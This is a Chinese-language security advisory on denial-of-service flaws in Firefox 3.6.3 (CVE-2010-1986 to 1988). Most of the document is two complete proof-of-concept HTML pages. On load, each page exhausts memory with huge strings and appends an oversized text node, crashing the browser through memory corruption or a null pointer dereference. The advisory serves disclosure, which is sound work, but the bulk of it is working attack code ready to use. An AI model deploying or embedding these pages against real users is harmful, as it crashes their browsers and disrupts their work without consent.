CVE(CAN) ID: CVE-2010-1986,CVE-2010-1987,CVE-2010-1988
Firefox是非常流行的开源WEB浏览器。
Firefox的xul.dll库中的gfxWindowsFontGroup::MakeTextRun函数和USP10.dll库的 DoubleWideCharMappedString类中存在多个拒绝服务漏洞。如果网页中的JavaScript代码可创建包含有超长字符串元素的数组之后将超长字符串附加到了P元素的内容,就会触发内存破坏或空指针引用,导致浏览器崩溃。
Mozilla Firefox 3.6.3
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[PoC #1 - firefox_3.6.3_dos_poc_1.htm]
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
function append_text_into_body()
{
var p1 = document.getElementById('p1');
var Text1 = "";
var TextNode = null;
// Trigger! MakeFont... into p element on body element.
for(var i = 0; i < 0x700000 / 4; i++)
{
Text1 = Text1 + "AAAA";
}
TextNode = document.createTextNode(Text1);
p1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}
var arr1, arr2, arr3, arr4, arr5;
var a = 1;
var timer;
function fill_all_memory()
{
var chunk = unescape("%u4141%u4141");
var i = 0;
if( a > 5 )
{
a++;
}
if(a >= 30)
{
append_text_into_body();
}
while(chunk.length <= 0x400000)
{
chunk = chunk + chunk;
}
chunk = chunk + chunk + chunk;
chunk = chunk.substring(0, chunk.length);
if(a == 1)
{
arr1 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr1[i] = chunk;
}
a = 2;
}
else if(a == 2)
{
arr2 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr2[i] = chunk;
}
a = 3;
}
else if(a == 3)
{
arr3 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr3[i] = chunk;
}
a = 4;
}
else if(a == 4)
{
arr4 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr4[i] = chunk;
}
a = 5;
}
else if(a == 5)
{
arr5 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr5[i] = chunk;
}
a = 6;
}
}
function try_fill()
{
fill_all_memory();
setTimeout("try_fill();", 500);
}
</SCRIPT>
</HEAD>
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>
[PoC #2 - firefox_3.6.3_dos_poc_2.htm] --
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
function append_text_into_body()
{
var p1 = document.getElementById('p1');
var Text1 = "";
var TextNode = null;
// Trigger! MakeFont... into p element on body element.
for(var i = 0; i < 0x700000 / 4; i++)
{
Text1 = Text1 + "AAAA";
}
TextNode = document.createTextNode(Text1);
p1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}
var a = 1;
var timer;
function fill_all_memory() // This function's variation can makes an null pointer deref without append_text_into_body() calling.
{
var chunk = unescape("%u4141%u4242");
var i = 0;
append_text_into_body();
while(chunk.length <= 0x400000)
{
chunk = chunk + chunk;
}
chunk = chunk + chunk + chunk;
chunk = chunk.substring(0, chunk.length);
}
function try_fill()
{
fill_all_memory();
// this poc makes 99% almost crashed same location as below.
// 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
// 73f937cd 0fb70448 movzx eax,word ptr [eax+ecx*2] ds:0023:00133000=????
// 100: ''
// 150: ''
// 200: ''
// 300: ''
// 500: ''
// 1000: ''
// 5000: ''
setTimeout("try_fill();", 10);
}
</SCRIPT>
</HEAD>
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>